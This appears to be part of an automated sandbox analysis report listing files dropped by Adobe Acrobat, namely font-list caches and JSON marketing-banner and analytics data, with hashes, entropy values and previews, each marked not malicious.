C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7768

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7768

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.3505025885059245
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJM3g98kUwPeUkwRe9:YvXKX9drEZc0v2GMbLUkee9
MD5:	DE16E4AC9E1A90875D2A72FAC474BF90
SHA1:	5AC48F30314B0B2A50D4502F3BFD2E164BE10C6E
SHA-256:	04FABCE6CCDB7BECD98DA42B5055EFF28BF01F6B3629F7A41A1AFEA58007C0ED
SHA-512:	47E873A350DE84A19CC43E4FE7AAD6486EE11778A752F7BFC3E3613A22D72B53697F6A6F96C8F5B6B544DBDA773DF514D09AE7C3CD2343FD7B6018E005AD3E7C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.298335401437078
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfBoTfXpnrPeUkwRe9:YvXKX9drEZc0v2GWTfXcUkee9
MD5:	51D958E01C2936D316E71B046D7B00D0
SHA1:	515DD1513B3BAAD70990BEE5B6640D0A4EA8A676
SHA-256:	21D98BEDB66D1FC9DDFB8CB0282180CA1EAE761D21C401FD56A4F04BD9A43BC3
SHA-512:	BCCFDD66746E6A2D40192B26FED2BF127A9C9465D94311B91D5442A881558D73ED84D4A9D3972B4511FEC06D9E937EB0437DB3DE569511AB9F73348B862981BC
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.277156476482677
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfBD2G6UpnrPeUkwRe9:YvXKX9drEZc0v2GR22cUkee9
MD5:	84AEBFBA61A4F47397F3BAE1EB35EFEB
SHA1:	8959CA817AF3BF10F10BAC617CEC7F904670D739
SHA-256:	93BFA14FE9CF847B37F06D7870C16FB62B832200A6E7AA070A223D3D9C99E42D
SHA-512:	CD8CE406E322D50A07C482C168C3C79E8279C64966BF09EEEA0D251813478E0A2B0E97F389BEF1C7674165461309218A0E0A6728D2375653B797E30063A4904D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.337061838637531
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfPmwrPeUkwRe9:YvXKX9drEZc0v2GH56Ukee9
MD5:	F57B295E1879E47A87C7AAFB79C74F28
SHA1:	52F0F9260C60E4A00FCD1FAA7FFA9F97BEBDB4DB
SHA-256:	7C015830064ABCD644D2D19DB1A1DB5E4C23E8483B1CE54E6ABF00B1D1ACFAEE
SHA-512:	897AD1B2E90E0A1DF2D91B513233A3D149C37CC368B704FB36AFD9C9B3FB4174ED558D84B2D00A10A788AC6A4CCB367EE8CB34CA9099CD43F78C8AF2F6B265BC
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1255
Entropy (8bit):	5.697841344751659
Encrypted:	false
SSDEEP:	24:Yv6XjrEzvjpLgEsv4ce3KnctSrymTBcu14wChluBks8ctq3H6w:YvjbhgnvjRrNTB5OJhABks8c2H3
MD5:	83B5A78640074BE50C0A976ADEA3188E
SHA1:	CFDB548C7444E09D8FD369B95A8901848B9E6626
SHA-256:	3B28454658CEB3A135FC34293AA490BC5948A17DC7793E5885A6B5264ADF9DC2
SHA-512:	F1363A2091EE3AEF59B01BC2FC94924B0494412C3D9ABED7143C327E7AC98419565C67E44A5E5769C38FFAF735FA1FC3BF0C9810061E93C6F8D99EE725523644
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_0","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"f7fa0e9f-7d25-4321-b719-c501bbb8a162","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0IGZpbGVzIHRvIGFuZCBmcm9tIFBERiBcbndpdGhvdXQgbGltaXRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5k

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	5.705924650104191
Encrypted:	false
SSDEEP:	24:Yv6XjrEzv/VLgEsy4c19ZrGmTBcu14wCh5rgos8ctq3H6w:YvjXFgnyl9ZrBTB5OJhFgos8c2H3
MD5:	AE1F871F39266581C6EAAB0052C008FE
SHA1:	6912F063B612B28221FB9FBDBE79218A8F29AAF4
SHA-256:	51F479F1DFEEB00A09AC293149374033FAA816F2B04798FCF55AB1B4489BD3AF
SHA-512:	3823C1FA97549E41C9575F1ADE7F191FC7C237B219AC41C8263B1E162BA68AB2556D74CE304A8C5CCB065D991138EA4A3914342E4D48E29F317E23113990418B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_1","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"250f56c6-2d66-4fca-8033-eabbd2bc9951","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0LCBlZGl0IGFuZCBlLXNpZ24gUERGXG4gZm9ybXMgJiBhZ3JlZW1lbnRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2Nvb

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.2852649756232015
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfQ1rPeUkwRe9:YvXKX9drEZc0v2GY16Ukee9
MD5:	6733266AE2B020F034106EA395FDB3C4
SHA1:	82048A05972CA8AE630931E29A0169EDD709D20B
SHA-256:	D91121A0C51D8AA3444AFA7AB8BCAB9CC45EC217383AE71CC268063886C25993
SHA-512:	7C8CBD17BA4BACDDC4621C64AF1A0436703B6A718EE86A91192F30D64D03EF8C820DC5C860D09C6BB94E52F37C2BE354C2F5FC5417AA02DD9ABF56CB4359CFC7
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1230
Entropy (8bit):	5.687883485146177
Encrypted:	false
SSDEEP:	24:Yv6XjrEzvO2LgEsk4ccVrhmTBcu14wChds8ctq3H6w:YvjGognkMVrYTB5OJhds8c2H3
MD5:	1D66578DDBF4CB4486114223831DD601
SHA1:	40BFD718948AD425DCCAC0E4C1685140EDCF0387
SHA-256:	5B5B2BCFE44DF186B670B7F0518C3D48D38AE63CE091B78431B70D8E5FD070C3
SHA-512:	5D3CEDE81164DD149DEF0C55A8C8544F66751BEC9DC0FDC553A08F54703B55571F02BA451CC3F36BDF0D2D4EA2A3E624462207E11D2BB54541F99CE7AC89E9D6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_3","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"07caa165-20a7-4c5f-adf8-061ef3d98af3","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2NvbG9yX2RhcmtfdGhlbWUiO

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	5.7518951012339485
Encrypted:	false
SSDEEP:	24:Yv6XjrEzvCKLgEGcooZbq0jCaBrwJoZct5uWaHbX3H6w:YvjqEgNoNtlSJEc3uWaHbHH3
MD5:	1202543A9C0708D01BEB1B9FAE071D78
SHA1:	E0A8D838CBE598262B5EDD2DB4BBB1BC5FB1A3BB
SHA-256:	C039E62C2A97ED47B074D88309B1030F63E4F8998F5E6422CD36ABA5304D316A
SHA-512:	A0F85F2531EA3263027F73AFFCAF7AEADA7969BD482E27F601CD5BFBFAEAA3A98A1D9C15036A9BA1258AAB0C84C110E95DA7C54BC1E8954114286B8491A518D6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"70654_217714ActionBlock_0","campaignId":70654,"containerId":"1","controlGroupId":"","treatmentId":"692283b7-dc9d-4f79-9ee2-bccf324c2980","variationId":"217714"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNyIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTEiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBhbGwgUERGIGFuZCBlLXNpZ25pbmcgdG9vbHMuIiwiYmFja2d

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.286890275515594
Encrypted:	false
SSDEEP:	6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfYdPeUkwRe9:YvXKX9drEZc0v2Gg8Ukee9
MD5:	E04A348FCA881C4EAF32B8EFC79BCD26
SHA1:	AAD874B9796EA320F8FDF8DDD56E3216C6A772CD
SHA-256:	1821E6655CCBFA2FCE7EE122A0A8900C200C3663CB70E44A6BDF536E6747139D
SHA-512:	DFD84B36C3C5AF7B0931A950564F93BFFD1D6BB99409E43E109D651803B26F7CB173E30258EDC1646DAEE3C40560E30C340151D9C86F0EA503FC07795185DB72
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1395
Entropy (8bit):	5.774979893660522
Encrypted:	false
SSDEEP:	24:Yv6XjrEzvBrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNNw:YvjZHgDv3W2aYQfgB5OUupHrQ9FJQ
MD5:	63C08DEEE241B08F4F595DA9AD5125CB
SHA1:	90A5918EB07A4873458C86964F3C394647A8C814
SHA-256:	A12F7D69BBEC7E8349C5BF9947F883673D15BF39CB49E2C2398AA96489342990
SHA-512:	6181F6664FFB2E2001FD4AFCD2767ED2BA2DCB80ED0F71DF88416E7FDA64D42556DA147D75340C3137599DE6F90091DD6B41F0ABD007634F4AE9CF8BF08736B9
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

